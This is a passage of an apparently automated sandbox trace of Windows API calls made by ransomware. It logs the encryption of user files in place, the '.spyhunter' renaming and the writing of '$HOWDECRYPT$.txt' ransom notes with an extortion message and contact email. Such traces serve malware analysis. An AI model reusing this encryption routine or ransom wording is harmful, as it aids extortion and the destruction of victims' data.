(lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.spyhunter" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.spyhunter")) returned 1 [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fface8 | out: hHeap=0x2c0000) returned 1 [0143.680] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2d8 | out: pbBuffer=0x248f2d8) returned 1 [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.680] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2d0*=0x30) returned 1 [0143.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.680] GetProcessHeap () returned 0x2c0000 [0143.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7708 | out: hHeap=0x2c0000) returned 1 [0143.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2d8 | out: pbBuffer=0x248f2d8) returned 1 [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2d0*=0x30) returned 1 [0143.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7638 | out: hHeap=0x2c0000) returned 1 [0143.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2d0 | out: pbBuffer=0x248f2d0) returned 1 [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2c8*=0x30) returned 1 [0143.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\.." (normalized: "c:\\users\\default\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.682] GetProcessHeap () returned 0x2c0000 [0143.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec02a0 | out: hHeap=0x2c0000) returned 1 [0143.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2d0 | out: pbBuffer=0x248f2d0) returned 1 [0143.683] GetProcessHeap () returned 0x2c0000 [0143.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2c8*=0x30) returned 1 [0143.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.683] GetProcessHeap () returned 0x2c0000 [0143.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.683] GetProcessHeap () returned 0x2c0000 [0143.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec01f0 | out: hHeap=0x2c0000) returned 1 [0143.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.683] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.683] WriteFile (in: hFile=0xac, lpBuffer=0x248f1ff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f328, lpOverlapped=0x0 | out: lpBuffer=0x248f1ff*, lpNumberOfBytesWritten=0x248f328*=0x127, lpOverlapped=0x0) returned 1 [0143.684] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.684] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f328, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f328*=0x2ac, lpOverlapped=0x0) returned 1 [0143.910] CloseHandle (hObject=0xac) returned 1 [0143.911] GetProcessHeap () returned 0x2c0000 [0143.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7908 | out: hHeap=0x2c0000) returned 1 [0143.911] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2c8 | out: pbBuffer=0x248f2c8) returned 1 [0143.911] GetProcessHeap () returned 0x2c0000 [0143.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.911] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2c0*=0x30) returned 1 [0143.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.912] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0143.912] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0143.912] GetProcessHeap () returned 0x2c0000 [0143.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.912] ReadFile (in: hFile=0xac, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f284, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f284*=0x2800, lpOverlapped=0x0) returned 1 [0143.913] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.913] WriteFile (in: hFile=0xac, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f284, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f284*=0x2800, lpOverlapped=0x0) returned 1 [0143.913] GetProcessHeap () returned 0x2c0000 [0143.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.914] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.914] WriteFile (in: hFile=0xac, lpBuffer=0x248f2c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f284, lpOverlapped=0x0 | out: lpBuffer=0x248f2c4*, lpNumberOfBytesWritten=0x248f284*=0x4, lpOverlapped=0x0) returned 1 [0143.916] WriteFile (in: hFile=0xac, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f284, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f284*=0x30, lpOverlapped=0x0) returned 1 [0143.916] CloseHandle (hObject=0xac) returned 1 [0143.916] GetProcessHeap () returned 0x2c0000 [0143.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.916] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.spyhunter") returned 94 [0143.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.spyhunter")) returned 1 [0143.917] GetProcessHeap () returned 0x2c0000 [0143.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.917] GetProcessHeap () returned 0x2c0000 [0143.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.918] GetProcessHeap () returned 0x2c0000 [0143.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30011a8 | out: hHeap=0x2c0000) returned 1 [0143.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.919] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.919] WriteFile (in: hFile=0xac, lpBuffer=0x248f1f7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f320, lpOverlapped=0x0 | out: lpBuffer=0x248f1f7*, lpNumberOfBytesWritten=0x248f320*=0x127, lpOverlapped=0x0) returned 1 [0143.920] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.920] WriteFile (in: hFile=0xac, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f320, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f320*=0x2ac, lpOverlapped=0x0) returned 1 [0143.920] CloseHandle (hObject=0xac) returned 1 [0143.922] GetProcessHeap () returned 0x2c0000 [0143.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30010b0 | out: hHeap=0x2c0000) returned 1 [0143.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2c0 | out: pbBuffer=0x248f2c0) returned 1 [0143.922] GetProcessHeap () returned 0x2c0000 [0143.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2b8*=0x30) returned 1 [0143.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.929] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 78 [0143.929] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0143.929] GetProcessHeap () returned 0x2c0000 [0143.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.929] ReadFile (in: hFile=0xac, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f27c*=0x1d51, lpOverlapped=0x0) returned 1 [0143.934] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.934] WriteFile (in: hFile=0xac, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x248f27c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f27c*=0x1d51, lpOverlapped=0x0) returned 1 [0143.934] GetProcessHeap () returned 0x2c0000 [0143.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.934] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.934] WriteFile (in: hFile=0xac, lpBuffer=0x248f2bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f27c, lpOverlapped=0x0 | out: lpBuffer=0x248f2bc*, lpNumberOfBytesWritten=0x248f27c*=0x4, lpOverlapped=0x0) returned 1 [0143.935] WriteFile (in: hFile=0xac, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f27c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f27c*=0x30, lpOverlapped=0x0) returned 1 [0143.935] CloseHandle (hObject=0xac) returned 1 [0143.935] GetProcessHeap () returned 0x2c0000 [0143.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.935] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.spyhunter") returned 88 [0143.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.spyhunter")) returned 1 [0143.936] GetProcessHeap () returned 0x2c0000 [0143.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.936] GetProcessHeap () returned 0x2c0000 [0143.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.936] GetProcessHeap () returned 0x2c0000 [0143.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f325c0 | out: hHeap=0x2c0000) returned 1 [0143.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2b8 | out: pbBuffer=0x248f2b8) returned 1 [0143.936] GetProcessHeap () returned 0x2c0000 [0143.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2b0*=0x30) returned 1 [0143.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.938] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 78 [0143.938] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0143.938] GetProcessHeap () returned 0x2c0000 [0143.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.938] ReadFile (in: hFile=0xac, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f274*=0xe6, lpOverlapped=0x0) returned 1 [0143.939] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.939] WriteFile (in: hFile=0xac, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f274*=0xe6, lpOverlapped=0x0) returned 1 [0143.939] GetProcessHeap () returned 0x2c0000 [0143.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.939] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.939] WriteFile (in: hFile=0xac, lpBuffer=0x248f2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x248f2b4*, lpNumberOfBytesWritten=0x248f274*=0x4, lpOverlapped=0x0) returned 1 [0143.939] WriteFile (in: hFile=0xac, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f274*=0x30, lpOverlapped=0x0) returned 1 [0143.939] CloseHandle (hObject=0xac) returned 1 [0143.940] GetProcessHeap () returned 0x2c0000 [0143.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.940] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.spyhunter") returned 88 [0143.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.spyhunter")) returned 1 [0143.940] GetProcessHeap () returned 0x2c0000 [0143.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0143.941] GetProcessHeap () returned 0x2c0000 [0143.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.941] GetProcessHeap () returned 0x2c0000 [0143.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f324d8 | out: hHeap=0x2c0000) returned 1 [0143.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2b8 | out: pbBuffer=0x248f2b8) returned 1 [0143.941] GetProcessHeap () returned 0x2c0000 [0143.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2b0*=0x30) returned 1 [0143.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.949] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 81 [0143.949] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0143.950] GetProcessHeap () returned 0x2c0000 [0143.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.950] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f274*=0x2800, lpOverlapped=0x0) returned 1 [0144.068] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.068] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f274*=0x2800, lpOverlapped=0x0) returned 1 [0144.068] GetProcessHeap () returned 0x2c0000 [0144.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0144.068] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.068] WriteFile (in: hFile=0xac, lpBuffer=0x248f2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x248f2b4*, lpNumberOfBytesWritten=0x248f274*=0x4, lpOverlapped=0x0) returned 1 [0144.068] WriteFile (in: hFile=0xac, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f274, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f274*=0x30, lpOverlapped=0x0) returned 1 [0144.068] CloseHandle (hObject=0xac) returned 1 [0144.234] GetProcessHeap () returned 0x2c0000 [0144.234] RtlAllocateHeap (HeapHandle=0x2c0000, 